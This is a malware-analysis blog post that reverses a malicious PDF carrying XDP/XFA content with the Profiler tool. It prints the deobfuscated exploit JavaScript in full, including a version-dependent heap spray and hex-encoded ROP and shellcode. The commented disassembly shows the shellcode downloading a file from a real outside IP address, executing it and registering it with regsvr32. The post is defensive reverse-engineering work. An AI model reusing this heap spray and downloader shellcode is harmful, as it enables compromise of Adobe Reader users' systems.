Recently version 2.6 of Profiler has been released and among the improvements support for XDP has been introduced. For those of you who are unfamiliar with XPD, here’s the Wikipedia description:
“XML Data Package (XDP) is an XML file format created by Adobe Systems in 2003. It is intended to be an XML-based companion to PDF. It allows PDF content and/or Adobe XML Forms Architecture (XFA) resources to be packaged within an XML container.
XDP is XML 1.0 compliant. The XDP may be a standalone document or it may in turn be carried inside a PDF document.
XDP provides a mechanism for packaging form components within a surrounding XML container. An XDP can also package a PDF file, along with XML form and template data. When the XFA (XML Forms Architecture) grammars used for an XFA form are moved from one application to another, they must be packaged as an XML Data Package.”
So I’ll use the occasion to show the reversing of a nice PDF with all the goodies. Let’s open the suspicious PDF.
The PDF is already heavily flagged by Profiler, as it contains many suspicious features.
If we take a look, just out of curiosity, at the object 8 of the PDF we will notice that the XDP data contains a bogus endstream keyword to fool the parsers of security solutions.
Profiler handles this correctly, so we don’t have to do anything, just worth mentioning.
Let’s take a look at the raw XDP data.
As you can see, it is completely unreadable because of the XML escaped characters. Even this is not really important for us, since the XML parser of Profiler handles this automatically, again just worth mentioning.
So let’s open directly the embedded XDP child and we can see a readable and nicely indented XML.
We can see that the XML contains JavaScript code, but Profiler already warns us of this. So let’s just click on the warning.
The code isn’t readable. So let’s select the JavaScript portion and then press Ctrl+R->Beautify JavaScript.
Much better, isn’t it?
The code is quite easy to understand although it’s obfuscated. It takes a value straight from the XDP, processes it and then calls eval on it.
This is the value it takes:
What we want is the result of the processing, before eval is called. So what I did is to modify slightly the JavaScript code like this:
ar = [HUGE STRING];
ar = ar.split('%%%');
s = Array();
cc = {
q: "var pding;b,cefhots_x=wAy()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
}.q;
function test3()
{
if (s) v = ar[z] * 1;
s = s + cc[v + 24];
}
for (i = 0; i - 3794 < 0; i++)
{
z = i;
test3();
}
print(s);
I didn't paste now the entire value in here as it was way too big, but I did so in the code edit:
At this point, we can just press Ctrl+R->Debug/Execute JavaScript and get the result of the execution.
We will get the following code:
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = app;
_l4 = new Array();
function _l5()
{
var _l6 = _l3.viewerVersion.toString();
_l6 = _l6.replace('.', '');
while (_l6.length < 4) _l6 += '0';
return parseInt(_l6, 10)
}
function _l7(_l8, _l9)
{
while (_l8.length * 2 < _l9) _l8 += _l8;
return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
_I1 = unescape(_I1);
roteDak = _I1.length * 2;
dakRote = unescape('%u9090');
spray = _l7(dakRote, 0x2000 - roteDak);
loxWhee = _I1 + spray;
loxWhee = _l7(loxWhee, 524098);
for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
while (_I1.length < len) _I1 += _I1;
return _I1.substring(0, len)
}
function _I3(_I1)
{
ret = '';
for (i = 0; i < _I1.length; i += 2)
{
b = _I1.substr(i, 2);
c = parseInt(b, 16);
ret += String.fromCharCode(c);
}
return ret
}
function _ji1(_I1, _I4)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6++)
{
_l9 = _I4.length;
_I7 = _I1.charCodeAt(_I6);
_I8 = _I4.charCodeAt(_I6 % _l9);
_I5 += String.fromCharCode(_I7 ^ _I8);
}
return _I5
}
function _I9(_I6)
{
_j0 = _I6.toString(16);
_j1 = _j0.length;
_I5 = (_j1 % 2) ? '0' + _j0 : _j0;
return _I5
}
function _j2(_I1)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
{
_I5 += '%u';
_I5 += _I9(_I1.charCodeAt(_I6 + 1));
_I5 += _I9(_I1.charCodeAt(_I6))
}
return _I5
}
function _j3()
{
_j4 = _l5();
if (_j4 < 9000)
{
_j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
_j6 = _l1;
_j7 = _I3(_j6)
}
else
{
_j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
_j6 = _l2;
_j7 = _I3(_j6)
}
_j8 = 'SUkqADggAABB';
_j9 = _I2('QUFB', 10984);
_ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
_ll1 = _j8 + _j9 + _ll0 + _j5;
_ll2 = _ji1(_j7, '');
if (_ll2.length % 2) _ll2 += unescape('%00');
_ll3 = _j2(_ll2);
with(
{
k: _ll3
}) _I0(k);
qwe123b.rawValue = _ll1
}
_j3();
What it does is basically to spray the heap using an array. It changes the payload based on the version of Adobe Reader. The version is retrieved by calling the _l5 function.
Now we could just examine the _l1 or _l2 payloads directly, but just to make sure I let the code generate a spray portion. So I changed the code accordingly and avoided to actually spray a lot of data.
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = this;
_l4 = new Array();
/*function _l5()
{
var _l6 = _l3.viewerVersion.toString();
_l6 = _l6.replace('.', '');
while (_l6.length < 4) _l6 += '0';
return parseInt(_l6, 10)
}*/
function _l7(_l8, _l9)
{
while (_l8.length * 2 < _l9) _l8 += _l8;
return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
_I1 = unescape(_I1);
roteDak = _I1.length * 2;
dakRote = unescape('%u9090');
spray = _l7(dakRote, 0x2000 - roteDak);
loxWhee = _I1 + spray;
loxWhee = _l7(loxWhee, 0x2000);
for (i = 0; i < 1; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
while (_I1.length < len) _I1 += _I1;
return _I1.substring(0, len)
}
function _I3(_I1)
{
ret = '';
for (i = 0; i < _I1.length; i += 2)
{
b = _I1.substr(i, 2);
c = parseInt(b, 16);
ret += String.fromCharCode(c);
}
return ret
}
function _ji1(_I1, _I4)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6++)
{
_l9 = _I4.length;
_I7 = _I1.charCodeAt(_I6);
_I8 = _I4.charCodeAt(_I6 % _l9);
_I5 += String.fromCharCode(_I7 ^ _I8);
}
return _I5
}
function _I9(_I6)
{
_j0 = _I6.toString(16);
_j1 = _j0.length;
_I5 = (_j1 % 2) ? '0' + _j0 : _j0;
return _I5
}
function _j2(_I1)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
{
_I5 += '%u';
_I5 += _I9(_I1.charCodeAt(_I6 + 1));
_I5 += _I9(_I1.charCodeAt(_I6))
}
return _I5
}
function asciiToHex(str)
{
var arr = [];
for (var n = 0, l = str.length; n < l; n ++)
{
var ch = str.charCodeAt(n);
var hex = Number(ch & 0xFF).toString(16);
if (hex.length < 2) hex = "0" + hex;
arr.push(hex);
hex = Number(ch >>> 8).toString(16);
while (hex.length < 2) hex = "0" + hex;
arr.push(hex);
}
return arr.join('');
}
function _j3()
{
_j4 = 9000;
if (_j4 < 9000)
{
_j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
_j6 = _l1;
_j7 = _I3(_j6)
}
else
{
_j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
_j6 = _l2;
_j7 = _I3(_j6)
}
_j8 = 'SUkqADggAABB';
_j9 = _I2('QUFB', 10984);
_ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
_ll1 = _j8 + _j9 + _ll0 + _j5;
_ll2 = _ji1(_j7, '');
if (_ll2.length % 2) _ll2 += unescape('%00');
_ll3 = _j2(_ll2);
with(
{
k: _ll3
}) _I0(k);
print(asciiToHex(_l4[0]));
}
_j3();
We can run this script in the JavaScript debugger (Ctrl+R->Debug JavaScript).
The final print will give us the payload in memory. We can copy the just the initial part, avoiding the padding. Let's paste the string into a text editor in Profiler and then Ctrl+R->Hex string to bytes.
If we look at the payload, we can see that the beginning (the marked portion) looks like ROP code. So in order to avoid looking for the gadgets in memory, let's skip the ROP as it most likely is only going to jump to the actual shellcode. Let's assume that is the case and thus focus on the data which follows.
We can see a web address at the end of the data. So we could just assume that the shellcode downloads an executable and runs it. But just for the sake of completeness, let's analyze it.
We can of course disassemble the shellcode by applying a filter to it (Ctrl+T->x86 disasm). But what we'll do is to use a debugger via Ctrl+R->Shellcode to execute. This way we can quickly step through what it does.
Here's the commented code:
00000000 66 83 E4 FC and sp, 0xfffc
00000004 FC cld
00000005 85 E4 test esp, esp
00000007 75 34 jne 0x3d
0000000A 5F pop edi
0000000B 33 C0 xor eax, eax
0000000D 64 8B 40 30 mov eax, dword ptr fs:[eax + 0x30]
00000011 8B 40 0C mov eax, dword ptr [eax + 0xc]
00000014 8B 70 1C mov esi, dword ptr [eax + 0x1c]
00000017 56 push esi
00000018 8B 76 08 mov esi, dword ptr [esi + 8]
0000001B 33 DB xor ebx, ebx
0000001D 66 8B 5E 3C mov bx, word ptr [esi + 0x3c]
00000021 03 74 33 2C add esi, dword ptr [ebx + esi + 0x2c]
00000025 81 EE 15 10 FF FF sub esi, 0xffff1015
0000002B B8 8B 40 30 C3 mov eax, 0xc330408b
00000030 46 inc esi
00000031 39 06 cmp dword ptr [esi], eax
00000033 75 FB jne 0x30
00000035 87 34 24 xchg dword ptr [esp], esi
00000038 85 E4 test esp, esp
0000003A 75 51 jne 0x8d
0000003D EB 4C jmp 0x8b
; resolve API
0000003F 51 push ecx
00000040 56 push esi
00000041 8B 75 3C mov esi, dword ptr [ebp + 0x3c]
00000044 8B 74 35 78 mov esi, dword ptr [ebp + esi + 0x78]
00000048 03 F5 add esi, ebp
0000004A 56 push esi
0000004B 8B 76 20 mov esi, dword ptr [esi + 0x20]
0000004E 03 F5 add esi, ebp
00000050 33 C9 xor ecx, ecx
00000052 49 dec ecx
00000053 41 inc ecx
00000054 FC cld
00000055 AD lodsd eax, dword ptr [esi]
00000056 03 C5 add eax, ebp
00000058 33 DB xor ebx, ebx
0000005A 0F BE 10 movsx edx, byte ptr [eax]
0000005D 38 F2 cmp dl, dh
0000005F 74 08 je 0x69
00000061 C1 CB 0D ror ebx, 0xd
00000064 03 DA add ebx, edx
00000066 40 inc eax
00000067 EB F1 jmp 0x5a
00000069 3B 1F cmp ebx, dword ptr [edi]
0000006B 75 E6 jne 0x53
0000006D 5E pop esi
0000006E 8B 5E 24 mov ebx, dword ptr [esi + 0x24]
00000071 03 DD add ebx, ebp
00000073 66 8B 0C 4B mov cx, word ptr [ebx + ecx*2]
00000077 8D 46 EC lea eax, dword ptr [esi - 0x14]
0000007A FF 54 24 0C call dword ptr [esp + 0xc]
0000007E 8B D8 mov ebx, eax
00000080 03 DD add ebx, ebp
00000082 8B 04 8B mov eax, dword ptr [ebx + ecx*4]
00000085 03 C5 add eax, ebp
00000087 AB stosd dword ptr es:[edi], eax
00000088 5E pop esi
00000089 59 pop ecx
0000008A C3 ret
0000008B EB 53 jmp 0xe0
0000008D AD lodsd eax, dword ptr [esi]
0000008E 8B 68 20 mov ebp, dword ptr [eax + 0x20]
00000091 80 7D 0C 33 cmp byte ptr [ebp + 0xc], 0x33
00000095 74 03 je 0x9a
00000097 96 xchg eax, esi
00000098 EB F3 jmp 0x8d
0000009A 8B 68 08 mov ebp, dword ptr [eax + 8]
0000009D 8B F7 mov esi, edi
0000009F 6A 05 push 5
000000A1 59 pop ecx
000000A2 E8 98 FF FF FF call 0x3f ; resolve API
000000A7 E2 F9 loop 0xa2 ; loops resolving the following APIs:
; LoadLibraryA
; WinExec
; TerminateThread
; GetTempPathA
; VirtualProtect
000000A9 E8 00 00 00 00 call 0xae
000000AE 58 pop eax
000000AF 50 push eax
000000B0 6A 40 push 0x40
000000B2 68 FF 00 00 00 push 0xff
000000B7 50 push eax
000000B8 83 C0 19 add eax, 0x19
000000BB 50 push eax
000000BC 55 push ebp
000000BD 8B EC mov ebp, esp
000000BF 8B 5E 10 mov ebx, dword ptr [esi + 0x10]
000000C2 83 C3 05 add ebx, 5
000000C5 FF E3 jmp ebx ; calls VirtualProtect with stolen bytes
000000C7 68 6F 6E 00 00 push 0x6e6f
000000CC 68 75 72 6C 6D push 0x6d6c7275 ; pushes URLMON string to stack
000000D1 54 push esp
000000D2 FF 16 call dword ptr [esi] ; calls a gadget which calls LoadLibraryA and returns the URLMON base address
000000D4 83 C4 08 add esp, 8
000000D7 8B E8 mov ebp, eax
000000D9 E8 61 FF FF FF call 0x3f ; resolves URLDownloadToFileA
000000DE EB 02 jmp 0xe2
000000E0 EB 72 jmp 0x154
000000E2 81 EC 04 01 00 00 sub esp, 0x104
000000E8 8D 5C 24 0C lea ebx, dword ptr [esp + 0xc]
000000EC C7 04 24 72 65 67+ mov dword ptr [esp], 0x73676572
000000F3 C7 44 24 04 76 72+ mov dword ptr [esp + 4], 0x32337276
000000FB C7 44 24 08 20 2D+ mov dword ptr [esp + 8], 0x20732d20 ; pushes "regsvr32 -s " to the stack
00000103 53 push ebx
00000104 68 F8 00 00 00 push 0xf8
00000109 FF 56 0C call dword ptr [esi + 0xc] ; call GetTempFilePathA
0000010C 8B E8 mov ebp, eax
0000010E 33 C9 xor ecx, ecx
00000110 51 push ecx
00000111 C7 44 1D 00 77 70+ mov dword ptr [ebp + ebx], 0x74627077
00000119 C7 44 1D 05 2E 64+ mov dword ptr [ebp + ebx + 5], 0x6c6c642e
00000121 C6 44 1D 09 00 mov byte ptr [ebp + ebx + 9], 0 ; appends "wpbt0.dll" to the path
00000126 59 pop ecx
00000127 8A C1 mov al, cl
00000129 04 30 add al, 0x30
0000012B 88 44 1D 04 mov byte ptr [ebp + ebx + 4], al
0000012F 41 inc ecx
00000130 51 push ecx
00000131 6A 00 push 0
00000133 6A 00 push 0
00000135 53 push ebx
00000136 57 push edi
00000137 6A 00 push 0
00000139 FF 56 14 call dword ptr [esi + 0x14] ; calls URLDownloadToFileA with the created path with the URL: http://129.121.231.188/data/Home/w.php?f=16&e=4
0000013C 85 C0 test eax, eax
0000013E 75 16 jne 0x156
00000140 6A 00 push 0
00000142 53 push ebx
00000143 FF 56 04 call dword ptr [esi + 4] ; calls WinExec on the downloaded file
00000146 6A 00 push 0
00000148 83 EB 0C sub ebx, 0xc
0000014B 53 push ebx
0000014C FF 56 04 call dword ptr [esi + 4] ; calls WinExec on "regsvr32 -s " followed by the downloaded file
0000014F 83 C3 0C add ebx, 0xc
00000152 EB 02 jmp 0x156
00000154 EB 13 jmp 0x169
00000156 47 inc edi
00000157 80 3F 00 cmp byte ptr [edi], 0
0000015A 75 FA jne 0x156
0000015C 47 inc edi
0000015D 80 3F 00 cmp byte ptr [edi], 0
00000160 75 C4 jne 0x126
00000162 6A 00 push 0
00000164 6A FE push -2
00000166 FF 56 08 call dword ptr [esi + 8] ; calls TerminateThread
00000169 E8 9C FE FF FF call 0xa
So yes, in the end it just downloads the file from the address we've seen and tries to execute it, then tries to register it as a COM object. Some AV-evasion techniques are also present.
Cheers!
One thought on “PDF/XDP Malware Reversing”